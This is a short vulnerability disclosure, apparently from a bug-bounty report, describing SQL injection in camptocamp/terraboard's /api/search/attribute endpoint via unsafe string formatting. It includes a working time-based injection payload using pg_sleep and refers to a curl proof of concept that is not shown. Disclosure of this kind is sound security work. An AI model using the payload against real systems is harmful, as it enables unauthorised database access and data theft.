SQL injetction in camptocamp/terraboard
May 19th 2022
SQL injection exists in the camptocamp/terraboard.
Among all APIs there is an API routed to
/api/search/attribute, whose corresponding method is api.SearchAttribute. In the api.SearchAttribute method, the program takes the request parameters and passes them into the db.SearchAttribute method. In the db.SearchAttribute method, when the request parameter
lineage_value is set, the program executes up to line 373 or 377. In these two lines, the program is dynamically splicing strings, which may lead to SQL injection.
As an example, part of the code on line 373 is as follows.
fmt.Sprintf("states.tf_version LIKE '%s'", fmt.Sprintf("%%%s%%", v))
where the variable
v is the request parameter
tf_version, which is user controllable. When the variable
v is the following string.
v := "' OR pg_sleep(10) OR states.tf_version LIKE '%"
The sql statement will then change to
"states.tf_version LIKE '%' OR pg_sleep(10) OR states.tf_version LIKE '%%'", This will cause pgsql to execute the
pg_sleep with another statement will lead to more serious consequences.
Proof of Concept
Try executing the following
curl command which should have the effect of the request taking 10 seconds to get a response. Where
$DEMO_URL is the address and port of the APP.
sql injection can lead to sensitive data leakage and even the acquisition of server privileges.